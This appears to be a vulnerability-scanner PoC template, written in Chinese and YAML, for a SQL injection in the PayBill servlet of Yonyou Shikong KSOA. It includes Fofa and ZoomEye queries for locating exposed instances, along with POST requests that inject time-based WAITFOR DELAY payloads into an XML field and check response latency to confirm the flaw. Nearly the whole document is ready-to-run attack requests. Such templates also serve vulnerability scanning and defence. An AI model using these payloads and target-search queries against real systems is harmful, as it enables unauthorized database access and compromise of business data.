漏洞描述
Fofa: app="用友-时空KSOA"
ZoomEye: app:"用友时空KSOA"
yonyou-ksoa-paybill-sqi: 用友时空 KSOA PayBill SQL 注入漏洞
PoC代码[已公开]
id: yonyou-ksoa-paybill-sqi
info:
name: 用友时空 KSOA PayBill SQL 注入漏洞
author: Observer
severity: high
verified: false
description: |-
Fofa: app="用友-时空KSOA"
ZoomEye: app:"用友时空KSOA"
reference:
- https://mp.weixin.qq.com/s/F26g6YiEAB6tgKQsyAo_5w?poc_token=HKvcc2WjQN-i34WdMTGNfKvE2ncprboLkp4DGWg3
tags: yonyou,ksoa,sqli
created: 2023/12/06
set:
r1: randomInt(600000, 900000)
rules:
r0:
request:
method: POST
path: /servlet/PayBill?caculate&_rnd=
body: |
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1</name><name>1</name><name>{{r1}}</name></root>
expression: response.status == 200 && response.body.bcontains(bytes(string(r1)))
output:
t0: response.latency
r1:
request:
method: POST
path: /servlet/PayBill?caculate&_rnd=
body: |
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY'0:0:5';--+</name><name>1</name><name>{{r1}}</name></root>
expression: response.status == 200 && response.body.bcontains(bytes(string(r1))) && response.latency >= 4500
r2:
request:
method: POST
path: /servlet/PayBill?caculate&_rnd=
body: |
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY'0:0:3';--+</name><name>1</name><name>{{r1}}</name></root>
expression: response.status == 200 && response.body.bcontains(bytes(string(r1))) && response.latency >= 2500
r3:
request:
method: POST
path: /servlet/PayBill?caculate&_rnd=
body: |
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY'0:0:5';--+</name><name>1</name><name>{{randstr}}</name></root>
expression: response.status == 200 && response.body.bcontains(bytes(string(r1))) && response.latency >= 4500
expression: r0() && r1() && r2() && r3()